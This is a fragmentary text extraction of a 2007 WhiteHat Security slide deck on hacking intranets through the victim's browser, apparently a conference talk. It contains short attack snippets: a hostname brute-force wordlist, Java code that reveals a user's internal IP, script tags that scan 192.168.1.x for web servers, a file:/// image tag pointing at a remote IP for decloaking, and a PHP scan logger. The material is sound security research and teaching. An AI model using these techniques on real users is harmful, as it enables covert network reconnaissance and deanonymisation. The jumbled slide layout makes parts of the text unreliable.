Beruflich Dokumente
Kultur Dokumente
“Disturbing”
Brian Krebs, Washington Post
attacker.com
Exploiting
the Same- Read OK attacker.com
Origin Policy
Read Error bank.com
7
Denial
Anger
Bargaining
Depression
Acceptance
“I patch my browser, have a firewall
and use NAT. What do I have to be
worried about?” Browser doesn’t matter much
Common intranet
hostnames make good
targets as well...
http://ha.ckers.org/fierce/hosts.txt
© 2007 WhiteHat Security, Inc.
9
http://ha.ckers.org/fierce/hosts.txt
mail
0 apollo ba boy careers clubs corpmail cv documentacion
adam
01 app back br catalog cluster corporate cvs documentos
adkit
02 app01 backend bravo cc clusters correo cx domain
admin
03 app1 backup brazil cd cm correoweb cy domains
administracion
1 apple baker britian cdburner cmail cortafuegos cz dominio
administrador
10 application bakersfield broadcast cdn cms counterstrike d domino
administrator
11 applications balance broker cert cn courses dallas dominoweb
administrators
12 apps balancer bronze certificates co cr data doom
admins
13 appserver baltimore brown certify cocoa cricket database download
ads
intranet
14 aq banking bs certserv code crm database01 downloads
adserver
15 ar bayarea bsd certsrv coldfusion crs database02 downtown
adsl
16 archie bb bsd0 cf colombus cs database1 dragon
ae
17 arcsight bbdd bsd01 cg colorado cso database2 drupal
af
18 argentina bbs bsd02 cgi columbus css databases dsl
affiliate
19 arizona bd bsd1 ch com ct datastore dyn
affiliates
2 arkansas bdc bsd2 channel commerce cu datos dynamic
afiliados
20 arlington be bt channels commerceserver cust1 david dynip
ag
3 as bea bug charlie communigate cust10 db dz
HR
agenda
3com as400 beta buggalo charlotte community cust100 db0 e
agent
4 asia bf bugs chat compaq cust101 db01 e-com
ai
5 asterix bg bugzilla chats compras cust102 db02 e-commerce
aix
6 at bh build chatserver con cust103 db1 e0
ajax
7 athena bi bulletins check concentrator cust104 db2 eagle
ak
8 atlanta billing burn checkpoint conf cust105 dc earth
akamai
9 atlas biz burner chi conference cust106 de east
al
ILMI att biztalk buscador chicago conferencing cust107 dealers ec
alabama
a au bj buy ci confidential cust108 dec echo
exchange
alaska
a.auth-ns auction black bv cims connect cust109 def ecom
albuquerque
a01 austin blackberry bw cincinnati connecticut cust11 default ecommerce
alerts
a02 auth blog by cisco consola cust110 defiant edi
alpha
a1 auto blogs bz citrix console cust111 delaware edu
alterwind
a2 av blue c ck consult cust112 dell education
am
abc aw bm c.auth-ns cl consultant cust113 delta edward
amarillo
about ayuda bn ca class consultants cust114 delta1 ee
americas
ac az bnc cache classes consulting cust115 demo eg
an
router
academico b bo cafe classifieds consumer cust116 demonstration eh
anaheim
acceso b.auth-ns bob calendar classroom contact cust117 demos ejemplo
analyzer
access b01 bof california cleveland content cust118 denver elpaso
announce
accounting b02 boise call clicktrack contracts cust119 depot email
announcements
accounts b1 bolsa calvin client core cust12 des employees
antivirus
acid b2 border canada clientes core0 cust120 desarrollo empresa
ao
activestat b2b boston canal clients core01 cust121 descargas empresas
ap
ad b2c boulder canon club corp cust122 design en
apache
© 2007 WhiteHat Security, Inc.
10
Intranet Hacking
<APPLET CODE="MyAddress.class">
<PARAM NAME="URL" VALUE="demo.html?IP=">
</APPLET>
Lars Kindermann
function natIP() { http://reglos.de/myaddress/
var w = window.location;
var host = w.host;
var port = w.port || 80;
var Socket = (new java.net.Socket(host,port)).getLocalAddress().getHostAddress();
return Socket;
}
12
JavaScript can scan for Web Servers
Attacker can force a user’s browser to send
HTTP requests to anywhere, including the to
the intranet.
<SCRIPT SRC=”http://192.168.1.1/”></SCRIPT>
<SCRIPT SRC=”http://192.168.1.2/”></SCRIPT>
<SCRIPT SRC=”http://192.168.1.3/”></SCRIPT>
...
<SCRIPT SRC=”http://192.168.1.255/”></SCRIPT>
If a web server is
listening, HTML will
be returned causing
the JS interpreter to
error.
alert(new java.lang.String(buffer.array()));
2.2.2.2.2 - - [27/Jul/2007:09:29:53 -0700] "GET /log.cgi HTTP/1.1 "200 1879 "-" "-"
<img src="file:///\\123.123.123.123/...">
http://ha.ckers.org/blog/20070421/noisy-decloaking-methods/
© 2007 WhiteHat Security, Inc.
16
Denial
Anger
Bargaining
Depression
Acceptance
“What were the browser developers
thinking!?!”
Enumerating extensions, OS
applications, and usernames
<ul id="links">
<li><a id="link1" href="http://login.yahoo.com/">http://login.yahoo.com/</a></li>
<li><a id="link2" href="http://mail.google.com/">http://mail.google.com/</a></li>
<li><a id="link3" href="http://mail.yahoo.com/">http://mail.yahoo.com/</a></li>
</ul>
</body>
</html>
scan.php
<?php
session_start();
file_put_contents(
"/tmp/scan_".session_id().".txt", No IE
"{$_GET['ip']} - {$_GET['s']} {$_SERVER['REQUEST_TIME']}\n",
FILE_APPEND|LOCK_EX
Support :(
);
http://ilia.ws/archives/145-Network-Scanning-with-HTTP-without-JavaScript.html
© 2007 WhiteHat Security, Inc.
24
Who needs Web 2.0 hacking when
Web 0.9 works just fine.
15.227.217.77 - - [18/Jun/2007:07:00:14 -0700] "GET /... HTTP/1.1" 200 13823 "http://wildcat.boi.hp.com/... "
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322;
Tablet PC 1.7; .NET CLR 2.0.50727)"
http://www.anachronic.com/file_archive/advisories/01.10.2004.aeadvisory.txt
http://archives.neohapsis.com/archives/sf/www-mobile/2004-q4/0025.html
© 2007 WhiteHat Security, Inc.
30
Denial
Anger
Bargaining
Depression
Acceptance
Inspired By:
Kurt Grutzmacher
Seth Bromberger
http://www.whitehatsec.com/
http://www.sectheory.com/
Zope discovers a Web version of the Confused Deputy, calls it Client-Side Trojans
http://www.zope.org/Members/jim/ZopeSecurity/ClientSideTrojan
CERT® Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests
http://www.cert.org/advisories/CA-2000-02.html
Peter Watkins discovers Client-Side Trojans, calls it (CSRF, pronounced "sea surf")
http://www.tux.org/~peterw/csrf.txt
Thomas Schreiber discovers CSRF, doesn't like the name, calls it Session Riding
http://www.securenet.de/papers/Session_Riding.pdf
Jesse Burns discovers CSRF, doesn't like the acronym, changes it to XSRF.
http://www.isecpartners.com/files/XSRF_Paper_0.pdf
Phishing with Superbait, XSS used to host fake sites on the real website.
http://www.whitehatsec.com/presentations/phishing_superbait.pdf
39